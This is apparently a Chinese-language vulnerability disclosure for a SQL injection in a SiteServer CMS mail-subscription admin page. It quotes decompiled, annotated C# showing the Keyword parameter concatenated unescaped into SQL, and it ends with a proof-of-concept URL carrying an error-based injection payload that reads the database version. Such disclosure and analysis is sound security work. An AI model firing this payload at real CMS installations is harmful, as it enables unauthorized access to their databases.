SQL 注入存在于 /siteserver/cms/background_mailSubscribe.aspx
用 .NET Reflector 反编译 SiteServer.CMS.dll 文件，
相关代码如下：
```
if (((((uint) isPostBack) - ((uint) isPostBack)) >= 0) && isPostBack)
{
this.spContents.SelectCommand = DataProvider.MailSubscribeDAO.GetSelectCommend(base.PublishmentSystemID, base.Request.QueryString["Keyword"], base.Request.QueryString["DateFrom"], base.Request.QueryString["DateTo"]);
}
else
```
跟进 Keyword 参数所进入的 GetSelectCommend 方法：
```
/// <summary>
/// Builds the SQL text used to list mail subscriptions for a publishment system, optionally
/// filtered by keyword and date range. The WHERE text is accumulated in <c>builder</c> and
/// appended to a fixed SELECT (see the return at Label_002D).
/// </summary>
/// <param name="publishmentSystemID">Site id; only its zero/non-zero test is visible in this excerpt.</param>
/// <param name="keyword">Free-text filter, formatted directly into two LIKE patterns.</param>
/// <param name="dateFrom">Lower date bound; where it is used falls in the elided part of the listing.</param>
/// <param name="dateTo">Upper date bound, formatted directly into an AddDate comparison.</param>
/// <returns>Complete SELECT statement text; a plain string, not a parameterized command.</returns>
/// <remarks>
/// Decompiled, control-flow-obfuscated listing: the labels, gotos and uint arithmetic are
/// decompiler/obfuscator output, and the body between Label_0069 and Label_0197 is elided.
/// Security-relevant point: <c>keyword</c> and <c>dateTo</c> are inserted with AppendFormat with
/// no escaping and no parameters, so when the caller forwards request input unchanged (the
/// page-level caller shown above passes Request.QueryString values straight through) the result
/// is SQL-injectable. The fix is to emit parameter placeholders here and bind the values as
/// SqlParameters (for a SqlDataSource, via SelectParameters), and to escape LIKE wildcards
/// (% and _) in <c>keyword</c> if literal matching is intended.
/// </remarks>
public string GetSelectCommend(int publishmentSystemID, string keyword, string dateFrom, string dateTo)
{
// This item is obfuscated and can not be translated.
StringBuilder builder;
bool flag;
bool flag2;
if (publishmentSystemID != 0)
{
goto Label_02D7;
}
// Obfuscator-generated opaque predicate: a uint sum is always >= 0, so this branch is always taken.
if ((((uint) publishmentSystemID) + ((uint) publishmentSystemID)) >= 0)
{
goto Label_0311;
}
goto Label_026E;
Label_002D:
// Fixed column list and table; only the WHERE text held in builder varies.
return ("SELECT ID, PublishmentSystemID, Receiver, Mail, IPAddress, AddDate FROM siteserver_MailSubscribe " + builder.ToString());
Label_0069:
// dateTo is formatted straight into a quoted SQL literal — no parameter, no escaping.
builder.AppendFormat("(AddDate <= '{0}')", dateTo);
goto Label_002D;
.....
Label_0197:
// Opaque predicate: a uint value is never greater than uint.MaxValue, so this is always true.
if ((((uint) flag2) + ((uint) flag)) <= uint.MaxValue)
{
goto Label_016C;
}
goto Label_0151;
Label_01B4:
// Opaque predicate: x & 0 is always 0, so this branch is never taken.
if ((((uint) flag) & 0) != 0)
{
goto Label_02B6;
}
// keyword is formatted straight into two LIKE patterns — the injection point reachable from request input.
builder.AppendFormat("(Receiver LIKE '%{0}%' OR Mail LIKE '%{0}%')", keyword);
goto Label_0197;
```
漏洞证明
```
http://www.target.com/siteserver/cms/background_mailSubscribe.aspx?PublishmentSystemID=0&Keyword='%20and%201=@@version%20and%201='1&DateFrom=&DateTo=
```
